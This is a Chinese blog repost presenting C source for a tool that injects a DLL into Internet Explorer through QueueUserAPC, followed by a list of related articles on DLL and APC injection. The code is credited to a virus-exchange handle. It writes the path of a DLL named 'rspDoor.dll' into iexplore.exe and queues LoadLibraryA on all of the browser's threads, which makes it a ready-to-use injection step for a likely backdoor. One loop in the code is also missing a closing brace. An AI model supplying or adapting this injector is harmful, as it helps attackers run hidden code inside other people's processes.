QueueUserApc实现DLL注入的测试

最新推荐文章于 2022-07-16 01:58:03 发布
转载 最新推荐文章于 2022-07-16 01:58:03 发布 · 124 阅读 · 0
文章标签:

#数据结构与算法

#include  " stdafx.h "
#define  _WIN32_WINNT 0x0400
#define  WIN32_LEAN_AND_MEAN    //  从 Windows 头中排除极少使用的资料
#include  < stdio.h >
#include  < stdlib.h >
#include  < windows.h >
#include  < Tlhelp32.h >
#include   < winbase.h >
#pragma    comment  ( lib, "ws2_32.lib") 


//
//  coded by robinh00d[VX Z0NE]
 //  Email:robinh00d_at_qq_dot_com
 //  向指定进程的线程里插入APC实现DLL注入
 // 思路来自PJF的老文
 //
// typedef HANDLE (*OPENTHREAD) (DWORD dwFlag, BOOL bUnknow, DWORD dwThreadId); 
typedef HANDLE (__stdcall  * OPENTHREAD) (DWORD dwFlag, BOOL bUnknow, DWORD dwThreadId);
typedef  struct  _TIDLIST
{
DWORD dwTid ;
_TIDLIST  * pNext ;
}TIDLIST;

DWORD EnumThread(HANDLE hProcess, TIDLIST  * pThreadIdList)
{
    
TIDLIST  * pCurrentTid  =  pThreadIdList ;

 const   char  szInjectModName[]  =   " C:\\rspDoor.dll "  ;
DWORD dwLen  =  strlen(szInjectModName) ;

PVOID param  =  VirtualAllocEx(hProcess, \
         NULL, dwLen, MEM_COMMIT  |  MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE) ;

 if  (param  !=  NULL)
{
   DWORD dwRet ;
    if  (WriteProcessMemory(hProcess, param, (LPVOID)szInjectModName, dwLen,  & dwRet))
   {

     while  (pCurrentTid)
    {
        
        HMODULE hDll  =  ::LoadLibrary( " Kernel32.dll " ); 
        OPENTHREAD lpfnOpenThread  =  (OPENTHREAD)::GetProcAddress(hDll,  " OpenThread " ); 
      HANDLE hThread  =  lpfnOpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid -> dwTid);

      if  (hThread  !=  NULL)
     {
       //
       //  注入DLL到指定进程
       //
       
      QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (unsigned  long )param);
     }

     printf( " TID:%d\n " , pCurrentTid -> dwTid) ;
     pCurrentTid  =  pCurrentTid -> pNext ;
    }
   }
}
 return   0  ;
}
 //////////////////////////////////////////
//////////////////////////////////////////////// //
DWORD GetProcID( const   char   * szProcessName)
{
PROCESSENTRY32 pe32  =  { 0 } ;
pe32.dwSize  =   sizeof (PROCESSENTRY32);

HANDLE hSnapshot  =  CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,  0 ) ;

 if  (hSnapshot  ==  INVALID_HANDLE_VALUE)
{
    return   0xFFFFFFFF  ;
}

 if  ( ! Process32First(hSnapshot,  & pe32))
{
    return   0xFFFFFFFF  ;
}

 do
{
    if  ( ! _strnicmp(szProcessName, pe32.szExeFile, strlen(szProcessName)))
   {
    printf( " %s的PID是:%d\n " , pe32.szExeFile, pe32.th32ProcessID);
     return  pe32.th32ProcessID ;
   }
 while (Process32Next(hSnapshot,  & pe32));

 return   0xFFFFFFFF  ;

}
 ////////////////////////////////////
///////////////////////////////////////////////////////// //
TIDLIST *  InsertTid(TIDLIST  * pdwTidListHead, DWORD dwTid)
{
TIDLIST  * pCurrent  =  NULL ;
TIDLIST  * pNewMember  =  NULL ;

 if  (pdwTidListHead  ==  NULL)
{
    return  NULL ;
}
pCurrent  =  pdwTidListHead ;

 while  (pCurrent  !=  NULL)
{

    if  (pCurrent -> pNext  ==  NULL)
   {
     //
     //  定位到链表最后一个元素
     //
     pNewMember  =  (TIDLIST  * )malloc( sizeof (TIDLIST)) ;

     if  (pNewMember  !=  NULL)
    {
     pNewMember -> dwTid  =  dwTid ;
     pNewMember -> pNext  =  NULL ;
     pCurrent -> pNext  =  pNewMember ;
      return  pNewMember ;
    }
     else
    {
      return  NULL ;
    }
   }
   pCurrent  =  pCurrent -> pNext ;
}

 return  NULL ;
}

 int  EnumThreadID(DWORD dwPID, TIDLIST  * pdwTidList)
{
 int  i  =   0  ;

THREADENTRY32 te32  =  { 0 } ;
te32.dwSize =   sizeof (THREADENTRY32) ;

HANDLE hSnapshot  =  CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,dwPID) ;

 if (hSnapshot  !=  INVALID_HANDLE_VALUE)
{
    if (Thread32First(hSnapshot, & te32))
   {
     do
    {
      if (te32.th32OwnerProcessID == dwPID)
     {
       if  (pdwTidList -> dwTid  ==   0 )
      {
       pdwTidList -> dwTid  =  te32.th32ThreadID ;
      }
       else
      {
        if  (NULL  ==  InsertTid(pdwTidList, te32.th32ThreadID))
       {
        printf( " 插入失败!\n " ) ;
         return   0  ;
       }
      }
    
     }
    } while (Thread32Next(hSnapshot, & te32));
   }
}
 return   1  ;
}

 int  main( int  argc,  char *  argv[])
{
TIDLIST  * pTidHead  =  (TIDLIST  * )malloc( sizeof (TIDLIST)) ;

 if  (pTidHead  ==  NULL)
{
    return   1  ;
}
RtlZeroMemory(pTidHead,  sizeof (TIDLIST)) ;

DWORD dwPID  =   0  ;

 if  ((dwPID  =  GetProcID( " iexplore.exe " ))  ==   0xFFFFFFFF )
{
   printf( " 进程ID获取失败!\n " ) ;
    return   1  ;
}

 //
//  枚举线程ID
 //
 EnumThreadID(dwPID, pTidHead) ;

HANDLE hProcess  =  OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID) ;

 if  (hProcess  ==  NULL)
{
    return   1  ;
}
EnumThread(hProcess, pTidHead) ;

 return   0 ;
}

/Files/tt_mc/QUAinsert.rar

dll注入Hook
11-08
在"InjectTest"这个项目中,可能包含了一个演示如何实现DLL注入和Hook的示例。这个项目可能包括注入代码、Hook代码、测试程序以及相关的文档,帮助开发者理解和实践这两种技术。 总的来说,DLL注入和Hook是Windows...
使用全局和线程钩子注入DLL.rar
08-04
下面我们将详细探讨全局钩子(Global Hooks)和线程钩子(Thread Hooks)的概念、实现方式以及它们DLL注入的关系。 全局钩子是安装在整个系统级别的,这意味着一旦设置,无论哪个应用程序或线程触发了指定的事件...
QueueUserApc实现DLL注入
tikycc2的专栏
08-15 662
http://bbs.pediy.com/showthread.php?t=56071
DLL注入技术之APC注入
潜心学习
06-28 2595
DLL注入技术之APC注入     APC注入的原理是利用当线程被唤醒时APC中的注册函数会被执行的机制,并以此去执行我们的DLL加载代码,进而完成DLL注入的目的,其具体流程如下:     1)当EXE里某个线程执行到SleepEx()或者WaitForSingleObjectEx()时,系统就会产生一个软中断。     2)当线程再次被唤醒时,此线程会首先执行APC队列中的被注册的函
修改导入表实现DLL注入
01-17 4889
Code: [Copy to clipboard]   //// Copy from M
驱动DLL注入,APC注入,驱动回调注入实现详细流程及代码!
QQ1289671197的博客
10-16 6661
DLL注入有很多方法,远线程,钩子,输入法,劫持,APC等等。 现在的好多进程都有保护,特别是一些游戏有各种保护如TP TS HS NP CD GPK BE SG3等等保护,这样常规的注入方法就没效果了。 现在流行且稳定的注入方法一般都要用驱动来实现了,驱动注入,APC,回调等都可以用驱动注入。 驱动部分代码: #include "apc_inject_test.h" #include "asm_...
VC++实现DLL注入Hook技术示例解析
- 游戏开发:游戏开发者可以使用DLL注入技术来调试游戏或添加测试功能。 然而,DLL注入技术也常被用于恶意软件开发,如病毒、木马或广告软件等,用于在目标系统中执行非授权操作。因此,反病毒软件和安全机制通常会...
易语言实现多种DLL注入技术详解
总结:通用DLL注入器-易语言是一个包含多种注入技术的集合,提供了丰富的API和易语言源码,使得开发者能够理解和实现DLL注入。通过这种方式,开发者可以在不同环境下测试和应用这些技术,以满足不同项目和研究的需求...
通用注入工具无驱版(HOOK注入、远程注入)(DELPHI源码)
08-26
【标签】"DLL注入"表明这个工具的核心功能是将DLL动态地加载到其他进程,从而实现对目标进程的控制或扩展其功能。DLL注入在许多合法的应用场景中也有用,例如插件系统或性能分析工具,但同时也可能被滥用进行恶意...
VS2005(VC8) 使用 Boost
believefym的专栏
08-07 1880
Chui-Wen Chiu http://chuiwenchiu.spaces.live.com 2006.12.12 測試環境: [1] Widnows XP Professional [2] Visual Studio 2005 Team Studio(VC8.0) [3] WinCvs 1.3 1. 下載 Boost 透過 CVS 下載最新版 cv
详解最实用的几种dll注入方式
热门推荐
陈子青的博客
07-16 1万+
要谈dll注入,首先则要了解dll,对dll的概念和使用不熟悉的读者可移步所谓DLL注入就是将一个DLL放进某个进程的地址空间里,让它成为那个进程的一部分。这样该进程和dll共享同一内存空间,这样dll可以使用该进程的所有资源,随时监控程序运行。通常,我们将需要实现的功能封装生成dll文件,然后将其注入到某一进程中,从而在该进程中添加或扩展我们需要的功能。因此dll注入技术被广泛运用在恶意攻击、游戏外挂、木马等程序中。.........
QueueUserAPC()强制线程退出等待状态
小米的修行之路
02-07 549
#include "stdafx.h" volatile long nCount(0); VOID WINAPI APCFunc(ULONG_PTR dwParam) { printf("回调函数调用计数:%d\n",nCount++); } UINT WINAPI ThreadFunc(void* arg) { HANDLE hEvent = (HANDLE)arg; DWORD
在内核模式驱动程序中调用 DLL
迈克揉索芙特
12-20 4545
如果您从事过任何 Windows 编程,那么您可能写过至少一个 DLL。如果您刚开始编写 Windows 驱动程序,那么您可能试图从驱动程序调用 DLL,但是这并不可行。为什么呢?内核模式中 DLL 的基本问题是 DLL 是否调用任何用户模式代码。如果 DLL 包含除本地内核 API 调用之外的任何内容,那么如果您在编译时试图将驱动程序其链接,就会产生链接程序错误(内核根本不会加载它)。显然
一份全系统x86x64通用的镜像回调枚举(LoadImageNotify)
weixin_34062329的博客
08-13 550
为什么80%的码农都做不了架构师?>>> ...
一个简单的模板系统的实现(动态载入DLL
weixin_30896763的博客
08-09 278
目的:为WEB程序做一套模板系统,每个模板是一个dll,在不影响主程序的情况下,动态加载模板。 假设我们有一个类叫TUser,保存了用户的信息,很简单,只有username和email两个字段 /*************************************************************** **/user.cs **编译参数csc/...
一个PsSetLoadImageNotifyRoutine回调内核注入DLL,支持xp ~ win7源码
kingswb的博客
05-21 5826
标 题: 【原创】一个PsSetLoadImageNotifyRoutine回调内核注入DLL,支持xp ~ win7源码 作 者: oxlwj 时 间: 2011-09-11,10:43:53 链 接: http://bbs.pediy.com/showthread.php?t=139986 一个PsSetLoadImageNotifyRoutine回调内核注入DLL,支持xp ~ 
2020-11-24(dll注入的N种搞法)
寻梦&之璐
11-24 1217
所谓DLL注入,本来是软件用于向其他程序添加/扩展功能、调试或逆向工程的一种合法技术。不过,后来恶意软件也常用这种方式来干坏事。因此,这意味着从安全的角度来看,我们必须知道DLL注入是如何工作的。 之前,当我开始开发Red Team的定制工具(为了模拟不同类型的攻击者)时,我完成了这个小项目的大部分代码,并将该项目命名为“injectAllTheThings”。如果你想看一些使用DLL注入的具体示例,请访问这里。如果你想了解DLL注入,该项目也会很有帮助。实际上,我已经在一个单一的Visual Studio
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值